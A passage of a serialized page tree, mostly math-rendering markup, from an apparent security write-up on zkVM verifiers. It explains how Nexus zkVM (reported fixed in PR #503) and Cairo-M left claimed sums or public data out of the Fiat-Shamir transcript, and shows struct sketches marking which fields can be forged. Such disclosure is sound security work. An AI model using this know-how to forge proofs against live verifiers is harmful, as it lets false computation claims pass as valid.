"type":26,"tag":137,"props":119625,"children":119628},{"className":119626,"style":119627},[251],"height:0.2052em;",[119629],{"type":26,"tag":137,"props":119630,"children":119632},{"style":119631},"top:-2.2341em;margin-right:0.0714em;",[119633,119637],{"type":26,"tag":137,"props":119634,"children":119636},{"className":119635,"style":111483},[261],[],{"type":26,"tag":137,"props":119638,"children":119640},{"className":119639},[267,111488,111489,270],[119641],{"type":26,"tag":137,"props":119642,"children":119644},{"className":119643,"style":116838},[169,170,270],[119645],{"type":32,"value":11242},{"type":26,"tag":137,"props":119647,"children":119649},{"className":119648},[453],[119650],{"type":32,"value":456},{"type":26,"tag":137,"props":119652,"children":119654},{"className":119653},[246],[119655],{"type":26,"tag":137,"props":119656,"children":119659},{"className":119657,"style":119658},[251],"height:0.4048em;",[119660],{"type":26,"tag":137,"props":119661,"children":119662},{},[],{"type":26,"tag":137,"props":119664,"children":119665},{"style":116189},[119666,119670],{"type":26,"tag":137,"props":119667,"children":119669},{"className":119668,"style":114789},[261],[],{"type":26,"tag":137,"props":119671,"children":119673},{"className":119672,"style":116199},[116198],[],{"type":26,"tag":137,"props":119675,"children":119676},{"style":116203},[119677,119681],{"type":26,"tag":137,"props":119678,"children":119680},{"className":119679,"style":114789},[261],[],{"type":26,"tag":137,"props":119682,"children":119684},{"className":119683},[267,268,269,270],[119685],{"type":26,"tag":137,"props":119686,"children":119688},{"className":119687},[169,270],[119689],{"type":26,"tag":137,"props":119690,"children":119692},{"className":119691},[169,270],[119693],{"type":32,"value":878},{"type":26,"tag":137,"props":119695,"children":119697},{"className":119696},[453],[119698],{"type":32,"value":456},{"type":26,"tag":137,"props":119700,"children":119702},{"className":119701},[246],[119703],{"type":26,"tag":137,"props":119704,"children":119707},{"className":119705,"style":119706},[251],"height:0.6283em;",[119708],{"type":26,"tag":137,"props":119709,"children":119710},{},[],{"type":26,"tag":137,"props":119712,"children":119714},{"className":119713},[197,116136],[],{"type":26,"tag":137,"props":119716,"children":119718},{"className":119717,"style":348},[184],[],{"type":26,"tag":137,"props":119720,"children":119722},{"className":119721},[353],[119723],{"type":32,"value":1935},{"type":26,"tag":137,"props":119725,"children":119727},{"className":119726,"style":348},[184],[],{"type":26,"tag":137,"props":119729,"children":119731},{"className":119730},[151],[119732,119736,119793,119797],{"type":26,"tag":137,"props":119733,"children":119735},{"className":119734,"style":117047},[156],[],{"type":26,"tag":137,"props":119737,"children":119739},{"className":119738},[3722],[119740,119745],{"type":26,"tag":137,"props":119741,"children":119743},{"className":119742,"style":3725},[3722,3723,3724],[119744],{"type":32,"value":3728},{"type":26,"tag":137,"props":119746,"children":119748},{"className":119747},[236],[119749],{"type":26,"tag":137,"props":119750,"children":119752},{"className":119751},[241,417],[119753,119782],{"type":26,"tag":137,"props":119754,"children":119756},{"className":119755},[246],[119757,119777],{"type":26,"tag":137,"props":119758,"children":119760},{"className":119759,"style":116288},[251],[119761],{"type":26,"tag":137,"props":119762,"children":119763},{"style":24239},[119764,119768],{"type":26,"tag":137,"props":119765,"children":119767},{"className":119766,"style":262},[261],[],{"type":26,"tag":137,"props":119769,"children":119771},{"className":119770},[267,268,269,270],[119772],{"type":26,"tag":137,"props":119773,"children":119775},{"className":119774,"style":97062},[169,170,270],[119776],{"type":32,"value":91286},{"type":26,"tag":137,"props":119778,"children":119780},{"className":119779},[453],[119781],{"type":32,"value":456},{"type":26,"tag":137,"props":119783,"children":119785},{"className":119784},[246],[119786],{"type":26,"tag":137,"props":119787,"children":119789},{"className":119788,"style":117102},[251],[119790],{"type":26,"tag":137,"props":119791,"children":119792},{},[],{"type":26,"tag":137,"props":119794,"children":119796},{"className":119795,"style":185},[184],[],{"type":26,"tag":137,"props":119798,"children":119800},{"className":119799},[169],[119801,119805,119955],{"type":26,"tag":137,"props":119802,"children":119804},{"className":119803},[162,116136],[],{"type":26,"tag":137,"props":119806,"children":119808},{"className":119807},[116141],[119809],{"type":26,"tag":137,"props":119810,"children":119812},{"className":119811},[241,417],[119813,119944],{"type":26,"tag":137,"props":119814,"children":119816},{"className":119815},[246],[119817,119939],{"type":26,"tag":137,"props":119818,"children":119820},{"className":119819,"style":116154},[251],[119821,119908,119919],{"type":26,"tag":137,"props":119822,"children":119823},{"style":116158},[119824,119828],{"type":26,"tag":137,"props":119825,"children":119827},{"className":119826,"style":114789},[261],[],{"type":26,"tag":137,"props":119829,"children":119831},{"className":119830},[267,268,269,270],[119832],{"type":26,"tag":137,"props":119833,"children":119835},{"className":119834},[169,270],[119836,119841,119846],{"type":26,"tag":137,"props":119837,"children":119839},{"className":119838,"style":2321},[169,170,270],[119840],{"type":32,"value":2324},{"type":26,"tag":137,"props":119842,"children":119844},{"className":119843},[353,270],[119845],{"type":32,"value":1935},{"type":26,"tag":137,"props":119847,"children":119849},{"className":119848},[169,270],[119850,119860],{"type":26,"tag":137,"props":119851,"children":119853},{"className":119852},[169,32,270],[119854],{"type":26,"tag":137,"props":119855,"children":119857},{"className":119856},[169,270],[119858],{"type":32,"value":119859},"consumed",{"type":26,"tag":137,"props":119861,"children":119863},{"className":119862},[236],[119864],{"type":26,"tag":137,"props":119865,"children":119867},{"className":119866},[241,417],[119868,119897],{"type":26,"tag":137,"props":119869,"children":119871},{"className":119870},[246],[119872,119892],{"type":26,"tag":137,"props":119873,"children":119875},{"className":119874,"style":114950},[251],[119876],{"type":26,"tag":137,"props":119877,"children":119878},{"style":117192},[119879,119883],{"type":26,"tag":137,"props":119880,"children":119882},{"className":119881,"style":111483},[261],[],{"type":26,"tag":137,"props":119884,"children":119886},{"className":119885},[267,111488,111489,270],[119887],{"type":26,"tag":137,"props":119888,"children":119890},{"className":119889,"style":97062},[169,170,270],[119891],{"type":32,"value":91286},{"type":26,"tag":137,"props":119893,"children":119895},{"className":119894},[453],[119896],{"type":32,"value":456},{"type":26,"tag":137,"props":119898,"children":119900},{"className":119899},[246],[119901],{"type":26,"tag":137,"props":119902,"children":119904},{"className":119903,"style":117219},[251],[119905],{"type":26,"tag":137,"props":119906,"children":119907},{},[],{"type":26,"tag":137,"props":119909,"children":119910},{"style":116189},[119911,119915],{"type":26,"tag":137,"props":119912,"children":119914},{"className":119913,"style":114789},[261],[],{"type":26,"tag":137,"props":119916,"children":119918},{"className":119917,"style":116199},[116198],[],{"type":26,"tag":137,"props":119920,"children":119921},{"style":116203},[119922,119926],{"type":26,"tag":137,"props":119923,"children":119925},{"className":119924,"style":114789},[261],[],{"type":26,"tag":137,"props":119927,"children":119929},{"className":119928},[267,268,269,270],[119930],{"type":26,"tag":137,"props":119931,"children":119933},{"className":119932},[169,270],[119934],{"type":26,"tag":137,"props":119935,"children":119937},{"className":119936},[169,270],[119938],{"type":32,"value":878},{"type":26,"tag":137,"props":119940,"children":119942},{"className":119941},[453],[119943],{"type":32,"value":456},{"type":26,"tag":137,"props":119945,"children":119947},{"className":119946},[246],[119948],{"type":26,"tag":137,"props":119949,"children":119951},{"className":119950,"style":117267},[251],[119952],{"type":26,"tag":137,"props":119953,"children":119954},{},[],{"type":26,"tag":137,"props":119956,"children":119958},{"className":119957},[197,116136],[],{"type":26,"tag":35,"props":119960,"children":119961},{},[119962,119964,119969],{"type":32,"value":119963},"All ",{"type":26,"tag":130,"props":119965,"children":119967},{"className":119966},[],[119968],{"type":32,"value":117479},{"type":32,"value":119970}," values must sum to zero (everything produced is consumed).",{"type":26,"tag":35,"props":119972,"children":119973},{},[119974,119976,119981],{"type":32,"value":119975},"All constraints are combined into a composition polynomial. The verifier then checks this polynomial at a random point outside the execution domain, known as an ",{"type":26,"tag":84,"props":119977,"children":119978},{},[119979],{"type":32,"value":119980},"OODS (Out-of-Domain Sampling)",{"type":32,"value":119982}," test.",{"type":26,"tag":35,"props":119984,"children":119985},{},[119986],{"type":26,"tag":84,"props":119987,"children":119988},{},[119989],{"type":32,"value":118028},{"type":26,"tag":5512,"props":119991,"children":119993},{"code":119992},"NexusProof {\n    stark_proof: {\n        commitments: [Merkle roots of trace columns]\n        sampled_values: [polynomial evaluations]\n        fri_proof: [low-degree test proof]\n    }\n    claimed_sum: [FieldElement; NUM_COMPONENTS]  // \u003C- VULNERABLE\n    log_size: [component sizes]\n}\n",[119994],{"type":26,"tag":130,"props":119995,"children":119996},{"__ignoreMap":7},[119997],{"type":32,"value":119992},{"type":26,"tag":35,"props":119999,"children":120000},{},[120001,120003,120008],{"type":32,"value":120002},"The",{"type":26,"tag":130,"props":120004,"children":120006},{"className":120005},[],[120007],{"type":32,"value":117479},{"type":32,"value":120009}," values are checked to be of correct length, that they sum to zero, and are used in the final composition polynomial. But at no point were they absorbed into the transcript.",{"type":26,"tag":35,"props":120011,"children":120012},{},[120013],{"type":26,"tag":2210,"props":120014,"children":120017},{"alt":120015,"src":120016},"6_nexus_flow","/posts/zkvms-unfaithful-claims/6_nexus_flow.svg",[],{"type":26,"tag":35,"props":120019,"children":120020},{},[120021,120023,120032],{"type":32,"value":120022},"The OODS check computes the composition polynomial, which includes logup boundary constraints. These constraints are ",{"type":26,"tag":84,"props":120024,"children":120025},{},[120026,120027],{"type":32,"value":114489},{"type":26,"tag":130,"props":120028,"children":120030},{"className":120029},[],[120031],{"type":32,"value":117479},{"type":32,"value":7072},{"type":26,"tag":35,"props":120034,"children":120035},{},[120036],{"type":32,"value":120037},"The composition polynomial is a random linear combination of constraints:",{"type":26,"tag":35,"props":120039,"children":120040},{},[120041],{"type":26,"tag":130,"props":120042,"children":120044},{"className":120043},[133,134],[120045],{"type":26,"tag":137,"props":120046,"children":120048},{"className":120047},[140],[120049],{"type":26,"tag":137,"props":120050,"children":120052},{"className":120051,"ariaHidden":146},[145],[120053,120094,120233],{"type":26,"tag":137,"props":120054,"children":120056},{"className":120055},[151],[120057,120061,120066,120071,120076,120081,120085,120090],{"type":26,"tag":137,"props":120058,"children":120060},{"className":120059,"style":157},[156],[],{"type":26,"tag":137,"props":120062,"children":120064},{"className":120063,"style":1843},[169,170],[120065],{"type":32,"value":118841},{"type":26,"tag":137,"props":120067,"children":120069},{"className":120068},[162],[120070],{"type":32,"value":165},{"type":26,"tag":137,"props":120072,"children":120074},{"className":120073},[169,170],[120075],{"type":32,"value":173},{"type":26,"tag":137,"props":120077,"children":120079},{"className":120078},[197],[120080],{"type":32,"value":200},{"type":26,"tag":137,"props":120082,"children":120084},{"className":120083,"style":281},[184],[],{"type":26,"tag":137,"props":120086,"children":120088},{"className":120087},[286],[120089],{"type":32,"value":289},{"type":26,"tag":137,"props":120091,"children":120093},{"className":120092,"style":281},[184],[],{"type":26,"tag":137,"props":120095,"children":120097},{"className":120096},[151],[120098,120102,120159,120163,120220,120224,120229],{"type":26,"tag":137,"props":120099,"children":120101},{"className":120100,"style":118245},[156],[],{"type":26,"tag":137,"props":120103,"children":120105},{"className":120104},[3722],[120106,120111],{"type":26,"tag":137,"props":120107,"children":120109},{"className":120108,"style":3725},[3722,3723,3724],[120110],{"type":32,"value":3728},{"type":26,"tag":137,"props":120112,"children":120114},{"className":120113},[236],[120115],{"type":26,"tag":137,"props":120116,"children":120118},{"className":120117},[241,417],[120119,120148],{"type":26,"tag":137,"props":120120,"children":120122},{"className":120121},[246],[120123,120143],{"type":26,"tag":137,"props":120124,"children":120126},{"className":120125,"style":116822},[251],[120127],{"type":26,"tag":137,"props":120128,"children":120129},{"style":24239},[120130,120134],{"type":26,"tag":137,"props":120131,"children":120133},{"className":120132,"style":262},[261],[],{"type":26,"tag":137,"props":120135,"children":120137},{"className":120136},[267,268,269,270],[120138],{"type":26,"tag":137,"props":120139,"children":120141},{"className":120140},[169,170,270],[120142],{"type":32,"value":506},{"type":26,"tag":137,"props":120144,"children":120146},{"className":120145},[453],[120147],{"type":32,"value":456},{"type":26,"tag":137,"props":120149,"children":120151},{"className":120150},[246],[120152],{"type":26,"tag":137,"props":120153,"children":120155},{"className":120154,"style":117102},[251],[120156],{"type":26,"tag":137,"props":120157,"children":120158},{},[],{"type":26,"tag":137,"props":120160,"children":120162},{"className":120161,"style":185},[184],[],{"type":26,"tag":137,"props":120164,"children":120166},{"className":120165},[169],[120167,120172],{"type":26,"tag":137,"props":120168,"children":120170},{"className":120169,"style":117702},[169,170],[120171],{"type":32,"value":117705},{"type":26,"tag":137,"props":120173,"children":120175},{"className":120174},[236],[120176],{"type":26,"tag":137,"props":120177,"children":120179},{"className":120178},[241,417],[120180,120209],{"type":26,"tag":137,"props":120181,"children":120183},{"className":120182},[246],[120184,120204],{"type":26,"tag":137,"props":120185,"children":120187},{"className":120186,"style":556},[251],[120188],{"type":26,"tag":137,"props":120189,"children":120190},{"style":118335},[120191,120195],{"type":26,"tag":137,"props":120192,"children":120194},{"className":120193,"style":262},[261],[],{"type":26,"tag":137,"props":120196,"children":120198},{"className":120197},[267,268,269,270],[120199],{"type":26,"tag":137,"props":120200,"children":120202},{"className":120201},[169,170,270],[120203],{"type":32,"value":506},{"type":26,"tag":137,"props":120205,"children":120207},{"className":120206},[453],[120208],{"type":32,"value":456},{"type":26,"tag":137,"props":120210,"children":120212},{"className":120211},[246],[120213],{"type":26,"tag":137,"props":120214,"children":120216},{"className":120215,"style":464},[251],[120217],{"type":26,"tag":137,"props":120218,"children":120219},{},[],{"type":26,"tag":137,"props":120221,"children":120223},{"className":120222,"style":348},[184],[],{"type":26,"tag":137,"props":120225,"children":120227},{"className":120226},[353],[120228],{"type":32,"value":2172},{"type":26,"tag":137,"props":120230,"children":120232},{"className":120231,"style":348},[184],[],{"type":26,"tag":137,"props":120234,"children":120236},{"className":120235},[151],[120237,120241,120303,120308,120313],{"type":26,"tag":137,"props":120238,"children":120240},{"className":120239,"style":157},[156],[],{"type":26,"tag":137,"props":120242,"children":120244},{"className":120243},[169],[120245,120255],{"type":26,"tag":137,"props":120246,"children":120248},{"className":120247},[169,32],[120249],{"type":26,"tag":137,"props":120250,"children":120252},{"className":120251},[169],[120253],{"type":32,"value":120254},"constraint",{"type":26,"tag":137,"props":120256,"children":120258},{"className":120257},[236],[120259],{"type":26,"tag":137,"props":120260,"children":120262},{"className":120261},[241,417],[120263,120292],{"type":26,"tag":137,"props":120264,"children":120266},{"className":120265},[246],[120267,120287],{"type":26,"tag":137,"props":120268,"children":120270},{"className":120269,"style":556},[251],[120271],{"type":26,"tag":137,"props":120272,"children":120273},{"style":116745},[120274,120278],{"type":26,"tag":137,"props":120275,"children":120277},{"className":120276,"style":262},[261],[],{"type":26,"tag":137,"props":120279,"children":120281},{"className":120280},[267,268,269,270],[120282],{"type":26,"tag":137,"props":120283,"children":120285},{"className":120284},[169,170,270],[120286],{"type":32,"value":506},{"type":26,"tag":137,"props":120288,"children":120290},{"className":120289},[453],[120291],{"type":32,"value":456},{"type":26,"tag":137,"props":120293,"children":120295},{"className":120294},[246],[120296],{"type":26,"tag":137,"props":120297,"children":120299},{"className":120298,"style":464},[251],[120300],{"type":26,"tag":137,"props":120301,"children":120302},{},[],{"type":26,"tag":137,"props":120304,"children":120306},{"className":120305},[162],[120307],{"type":32,"value":165},{"type":26,"tag":137,"props":120309,"children":120311},{"className":120310},[169,170],[120312],{"type":32,"value":173},{"type":26,"tag":137,"props":120314,"children":120316},{"className":120315},[197],[120317],{"type":32,"value":200},{"type":26,"tag":35,"props":120319,"children":120320},{},[120321,120323,120328,120330,120335],{"type":32,"value":120322},"Since each constraint is linear in its ",{"type":26,"tag":130,"props":120324,"children":120326},{"className":120325},[],[120327],{"type":32,"value":117479},{"type":32,"value":120329},", the overall composition polynomial is linear in all ",{"type":26,"tag":130,"props":120331,"children":120333},{"className":120332},[],[120334],{"type":32,"value":117479},{"type":32,"value":120336}," values.",{"type":26,"tag":35,"props":120338,"children":120339},{},[120340,120342],{"type":32,"value":120341},"The verifier checks ",{"type":26,"tag":130,"props":120343,"children":120345},{"className":120344},[133,134],[120346],{"type":26,"tag":137,"props":120347,"children":120349},{"className":120348},[140],[120350],{"type":26,"tag":137,"props":120351,"children":120353},{"className":120352,"ariaHidden":146},[145],[120354,120415],{"type":26,"tag":137,"props":120355,"children":120357},{"className":120356},[151],[120358,120362,120367,120372,120382,120387,120397,120402,120406,120411],{"type":26,"tag":137,"props":120359,"children":120361},{"className":120360,"style":95590},[156],[],{"type":26,"tag":137,"props":120363,"children":120365},{"className":120364,"style":1843},[169,170],[120366],{"type":32,"value":118841},{"type":26,"tag":137,"props":120368,"children":120370},{"className":120369},[162],[120371],{"type":32,"value":165},{"type":26,"tag":137,"props":120373,"children":120375},{"className":120374},[169,32],[120376],{"type":26,"tag":137,"props":120377,"children":120379},{"className":120378},[169],[120380],{"type":32,"value":120381},"oods",{"type":26,"tag":137,"props":120383,"children":120385},{"className":120384,"style":621},[169],[120386],{"type":32,"value":5666},{"type":26,"tag":137,"props":120388,"children":120390},{"className":120389},[169,32],[120391],{"type":26,"tag":137,"props":120392,"children":120394},{"className":120393},[169],[120395],{"type":32,"value":120396},"point",{"type":26,"tag":137,"props":120398,"children":120400},{"className":120399},[197],[120401],{"type":32,"value":200},{"type":26,"tag":137,"props":120403,"children":120405},{"className":120404,"style":281},[184],[],{"type":26,"tag":137,"props":120407,"children":120409},{"className":120408},[286],[120410],{"type":32,"value":289},{"type":26,"tag":137,"props":120412,"children":120414},{"className":120413,"style":281},[184],[],{"type":26,"tag":137,"props":120416,"children":120418},{"className":120417},[151],[120419,120423],{"type":26,"tag":137,"props":120420,"children":120422},{"className":120421,"style":3835},[156],[],{"type":26,"tag":137,"props":120424,"children":120426},{"className":120425},[169,32],[120427],{"type":26,"tag":137,"props":120428,"children":120430},{"className":120429},[169],[120431],{"type":32,"value":119165},{"type":26,"tag":35,"props":120433,"children":120434},{},[120435,120437,120442,120444,120449],{"type":32,"value":120436},"With ",{"type":26,"tag":130,"props":120438,"children":120440},{"className":120439},[],[120441],{"type":32,"value":117479},{"type":32,"value":120443}," not in transcript, the composition polynomial becomes a linear function of the ",{"type":26,"tag":130,"props":120445,"children":120447},{"className":120446},[],[120448],{"type":32,"value":117479},{"type":32,"value":120450}," values. Combined with the constraint that claimed sums must sum to zero, this is a small linear system that is easily solvable.",{"type":26,"tag":35,"props":120452,"children":120453},{},[120454,120458,120460],{"type":26,"tag":84,"props":120455,"children":120456},{},[120457],{"type":32,"value":119321},{"type":32,"value":120459}," Fixed on October 24, 2025 via ",{"type":26,"tag":41,"props":120461,"children":120464},{"href":120462,"rel":120463},"https://github.com/nexus-xyz/nexus-zkvm/pull/503",[45],[120465],{"type":32,"value":120466},"PR #503",{"type":26,"tag":3265,"props":120468,"children":120469},{},[],{"type":26,"tag":118,"props":120471,"children":120473},{"id":120472},"cairo-m-kakarot-labs",[120474],{"type":32,"value":120475},"Cairo-M (Kakarot Labs)",{"type":26,"tag":35,"props":120477,"children":120478},{},[120479],{"type":32,"value":120480},"Cairo-M, built by Kakarot Labs, is an alternative proof system for the Cairo VM (used by Starknet).",{"type":26,"tag":35,"props":120482,"children":120483},{},[120484],{"type":32,"value":120485},"Cairo-M is in many ways similar to Nexus. It uses logup to prove global statements about the execution.",{"type":26,"tag":35,"props":120487,"children":120488},{},[120489],{"type":26,"tag":84,"props":120490,"children":120491},{},[120492],{"type":32,"value":118028},{"type":26,"tag":5512,"props":120494,"children":120496},{"code":120495},"Proof {\n    claim: ComponentSizes,\n    interaction_claim: LogupClaimsPerComponent,\n    public_data: {          // \u003C- VULNERABLE\n        initial_registers: { pc, fp },\n        final_registers: { pc, fp }, // \u003C- forged\n        clock,                       // \u003C- forged\n        initial_root,                \n        final_root,                  // \u003C- forged\n        public_memory: { program, input, output }, //output modified\n    },\n    stark_proof: [...],\n}\n",[120497],{"type":26,"tag":130,"props":120498,"children":120499},{"__ignoreMap":7},[120500],{"type":32,"value":120495},{"type":26,"tag":35,"props":120502,"children":120503},{},[120504],{"type":26,"tag":84,"props":120505,"children":120506},{},[120507],{"type":32,"value":118044},{"type":26,"tag":35,"props":120509,"children":120510},{},[120511],{"type":26,"tag":2210,"props":120512,"children":120515},{"alt":120513,"src":120514},"7_cairo_m_verification","/posts/zkvms-unfaithful-claims/7_cairo_m_verification.svg",[],{"type":26,"tag":35,"props":120517,"children":120518},{},[120519,120521,120527],{"type":32,"value":120520},"Lookup challenges are derived without ",{"type":26,"tag":130,"props":120522,"children":120524},{"className":120523},[],[120525],{"type":32,"value":120526},"public_data",{"type":32,"value":120528}," being  mixed into the transcript.",{"type":26,"tag":35,"props":120530,"children":120531},{},[120532,120533,120538,120540,120545],{"type":32,"value":19206},{"type":26,"tag":130,"props":120534,"children":120536},{"className":120535},[],[120537],{"type":32,"value":120526},{"type":32,"value":120539}," (program I/O, boundary registers, memory roots) enters the lookup relations inside ",{"type":26,"tag":762,"props":120541,"children":120542},{},[120543],{"type":32,"value":120544},"denominators",{"type":32,"value":120546}," through challenge-weighted encodings of tuples. Abstractly, the verifier checks a relation of the form:",{"type":26,"tag":35,"props":120548,"children":120549},{},[120550],{"type":26,"tag":130,"props":120551,"children":120553},{"className":120552},[133,134],[120554],{"type":26,"tag":137,"props":120555,"children":120557},{"className":120556},[140],[120558],{"type":26,"tag":137,"props":120559,"children":120561},{"className":120560,"ariaHidden":146},[145],[120562,120621,120667,120713],{"type":26,"tag":137,"props":120563,"children":120565},{"className":120564},[151],[120566,120570,120575,120580,120589,120594,120603,120608,120612,120617],{"type":26,"tag":137,"props":120567,"children":120569},{"className":120568,"style":95590},[156],[],{"type":26,"tag":137,"props":120571,"children":120573},{"className":120572},[169,170],[120574],{"type":32,"value":942},{"type":26,"tag":137,"props":120576,"children":120578},{"className":120577},[162],[120579],{"type":32,"value":165},{"type":26,"tag":137,"props":120581,"children":120583},{"className":120582},[169,32],[120584],{"type":26,"tag":137,"props":120585,"children":120587},{"className":120586},[169],[120588],{"type":32,"value":64276},{"type":26,"tag":137,"props":120590,"children":120592},{"className":120591,"style":621},[169],[120593],{"type":32,"value":5666},{"type":26,"tag":137,"props":120595,"children":120597},{"className":120596},[169,32],[120598],{"type":26,"tag":137,"props":120599,"children":120601},{"className":120600},[169],[120602],{"type":32,"value":6303},{"type":26,"tag":137,"props":120604,"children":120606},{"className":120605},[197],[120607],{"type":32,"value":200},{"type":26,"tag":137,"props":120609,"children":120611},{"className":120610,"style":348},[184],[],{"type":26,"tag":137,"props":120613,"children":120615},{"className":120614},[353],[120616],{"type":32,"value":356},{"type":26,"tag":137,"props":120618,"children":120620},{"className":120619,"style":348},[184],[],{"type":26,"tag":137,"props":120622,"children":120624},{"className":120623},[151],[120625,120629,120639,120644,120654,120658,120663],{"type":26,"tag":137,"props":120626,"children":120628},{"className":120627,"style":95590},[156],[],{"type":26,"tag":137,"props":120630,"children":120632},{"className":120631},[169,32],[120633],{"type":26,"tag":137,"props":120634,"children":120636},{"className":120635},[169],[120637],{"type":32,"value":120638},"(other transcript",{"type":26,"tag":137,"props":120640,"children":120642},{"className":120641,"style":621},[169],[120643],{"type":32,"value":5666},{"type":26,"tag":137,"props":120645,"children":120647},{"className":120646},[169,32],[120648],{"type":26,"tag":137,"props":120649,"children":120651},{"className":120650},[169],[120652],{"type":32,"value":120653},"bound terms)",{"type":26,"tag":137,"props":120655,"children":120657},{"className":120656,"style":281},[184],[],{"type":26,"tag":137,"props":120659,"children":120661},{"className":120660},[286],[120662],{"type":32,"value":289},{"type":26,"tag":137,"props":120664,"children":120666},{"className":120665,"style":281},[184],[],{"type":26,"tag":137,"props":120668,"children":120670},{"className":120669},[151],[120671,120676,120681,120686,120691,120695,120700,120704,120709],{"type":26,"tag":137,"props":120672,"children":120675},{"className":120673,"style":120674},[156],"height:0.8778em;vertical-align:-0.1944em;",[],{"type":26,"tag":137,"props":120677,"children":120679},{"className":120678},[169],[120680],{"type":32,"value":1817},{"type":26,"tag":137,"props":120682,"children":120684},{"className":120683},[177],[120685],{"type":32,"value":180},{"type":26,"tag":137,"props":120687,"children":120690},{"className":120688,"style":120689},[184],"margin-right:2em;",[],{"type":26,"tag":137,"props":120692,"children":120694},{"className":120693,"style":185},[184],[],{"type":26,"tag":137,"props":120696,"children":120698},{"className":120697},[169,170],[120699],{"type":32,"value":942},{"type":26,"tag":137,"props":120701,"children":120703},{"className":120702,"style":281},[184],[],{"type":26,"tag":137,"props":120705,"children":120707},{"className":120706},[286],[120708],{"type":32,"value":289},{"type":26,"tag":137,"props":120710,"children":120712},{"className":120711,"style":281},[184],[],{"type":26,"tag":137,"props":120714,"children":120716},{"className":120715},[151],[120717,120722,120779,120783,121001],{"type":26,"tag":137,"props":120718,"children":120721},{"className":120719,"style":120720},[156],"height:1.4071em;vertical-align:-0.562em;",[],{"type":26,"tag":137,"props":120723,"children":120725},{"className":120724},[3722],[120726,120731],{"type":26,"tag":137,"props":120727,"children":120729},{"className":120728,"style":3725},[3722,3723,3724],[120730],{"type":32,"value":3728},{"type":26,"tag":137,"props":120732,"children":120734},{"className":120733},[236],[120735],{"type":26,"tag":137,"props":120736,"children":120738},{"className":120737},[241,417],[120739,120768],{"type":26,"tag":137,"props":120740,"children":120742},{"className":120741},[246],[120743,120763],{"type":26,"tag":137,"props":120744,"children":120746},{"className":120745,"style":116822},[251],[120747],{"type":26,"tag":137,"props":120748,"children":120749},{"style":24239},[120750,120754],{"type":26,"tag":137,"props":120751,"children":120753},{"className":120752,"style":262},[261],[],{"type":26,"tag":137,"props":120755,"children":120757},{"className":120756},[267,268,269,270],[120758],{"type":26,"tag":137,"props":120759,"children":120761},{"className":120760},[169,170,270],[120762],{"type":32,"value":506},{"type":26,"tag":137,"props":120764,"children":120766},{"className":120765},[453],[120767],{"type":32,"value":456},{"type":26,"tag":137,"props":120769,"children":120771},{"className":120770},[246],[120772],{"type":26,"tag":137,"props":120773,"children":120775},{"className":120774,"style":117102},[251],[120776],{"type":26,"tag":137,"props":120777,"children":120778},{},[],{"type":26,"tag":137,"props":120780,"children":120782},{"className":120781,"style":185},[184],[],{"type":26,"tag":137,"props":120784,"children":120786},{"className":120785},[169],[120787,120791,120997],{"type":26,"tag":137,"props":120788,"children":120790},{"className":120789},[162,116136],[],{"type":26,"tag":137,"props":120792,"children":120794},{"className":120793},[116141],[120795],{"type":26,"tag":137,"props":120796,"children":120798},{"className":120797},[241,417],[120799,120985],{"type":26,"tag":137,"props":120800,"children":120802},{"className":120801},[246],[120803,120980],{"type":26,"tag":137,"props":120804,"children":120806},{"className":120805,"style":116154},[251],[120807,120949,120960],{"type":26,"tag":137,"props":120808,"children":120809},{"style":116158},[120810,120814],{"type":26,"tag":137,"props":120811,"children":120813},{"className":120812,"style":114789},[261],[],{"type":26,"tag":137,"props":120815,"children":120817},{"className":120816},[267,268,269,270],[120818],{"type":26,"tag":137,"props":120819,"children":120821},{"className":120820},[169,270],[120822,120827,120832,120838,120843,120848,120905,120910,120919,120924,120933,120939,120944],{"type":26,"tag":137,"props":120823,"children":120825},{"className":120824,"style":2321},[169,170,270],[120826],{"type":32,"value":2324},{"type":26,"tag":137,"props":120828,"children":120830},{"className":120829},[353,270],[120831],{"type":32,"value":356},{"type":26,"tag":137,"props":120833,"children":120835},{"className":120834},[162,270],[120836],{"type":32,"value":120837},"⟨",{"type":26,"tag":137,"props":120839,"children":120841},{"className":120840,"style":117702},[169,170,270],[120842],{"type":32,"value":117705},{"type":26,"tag":137,"props":120844,"children":120846},{"className":120845},[177,270],[120847],{"type":32,"value":180},{"type":26,"tag":137,"props":120849,"children":120851},{"className":120850},[169,270],[120852,120857],{"type":26,"tag":137,"props":120853,"children":120855},{"className":120854},[169,170,270],[120856],{"type":32,"value":24313},{"type":26,"tag":137,"props":120858,"children":120860},{"className":120859},[236],[120861],{"type":26,"tag":137,"props":120862,"children":120864},{"className":120863},[241,417],[120865,120894],{"type":26,"tag":137,"props":120866,"children":120868},{"className":120867},[246],[120869,120889],{"type":26,"tag":137,"props":120870,"children":120872},{"className":120871,"style":116939},[251],[120873],{"type":26,"tag":137,"props":120874,"children":120875},{"style":111478},[120876,120880],{"type":26,"tag":137,"props":120877,"children":120879},{"className":120878,"style":111483},[261],[],{"type":26,"tag":137,"props":120881,"children":120883},{"className":120882},[267,111488,111489,270],[120884],{"type":26,"tag":137,"props":120885,"children":120887},{"className":120886},[169,170,270],[120888],{"type":32,"value":506},{"type":26,"tag":137,"props":120890,"children":120892},{"className":120891},[453],[120893],{"type":32,"value":456},{"type":26,"tag":137,"props":120895,"children":120897},{"className":120896},[246],[120898],{"type":26,"tag":137,"props":120899,"children":120901},{"className":120900,"style":111508},[251],[120902],{"type":26,"tag":137,"props":120903,"children":120904},{},[],{"type":26,"tag":137,"props":120906,"children":120908},{"className":120907},[162,270],[120909],{"type":32,"value":165},{"type":26,"tag":137,"props":120911,"children":120913},{"className":120912},[169,32,270],[120914],{"type":26,"tag":137,"props":120915,"children":120917},{"className":120916},[169,270],[120918],{"type":32,"value":64276},{"type":26,"tag":137,"props":120920,"children":120922},{"className":120921,"style":621},[169,270],[120923],{"type":32,"value":5666},{"type":26,"tag":137,"props":120925,"children":120927},{"className":120926},[169,32,270],[120928],{"type":26,"tag":137,"props":120929,"children":120931},{"className":120930},[169,270],[120932],{"type":32,"value":6303},{"type":26,"tag":137,"props":120934,"children":120936},{"className":120935},[197,270],[120937],{"type":32,"value":120938},")⟩",{"type":26,"tag":137,"props":120940,"children":120942},{"className":120941},[353,270],[120943],{"type":32,"value":356},{"type":26,"tag":137,"props":120945,"children":120947},{"className":120946,"style":117757},[169,170,270],[120948],{"type":32,"value":117760},{"type":26,"tag":137,"props":120950,"children":120951},{"style":116189},[120952,120956],{"type":26,"tag":137,"props":120953,"children":120955},{"className":120954,"style":114789},[261],[],{"type":26,"tag":137,"props":120957,"children":120959},{"className":120958,"style":116199},[116198],[],{"type":26,"tag":137,"props":120961,"children":120962},{"style":116203},[120963,120967],{"type":26,"tag":137,"props":120964,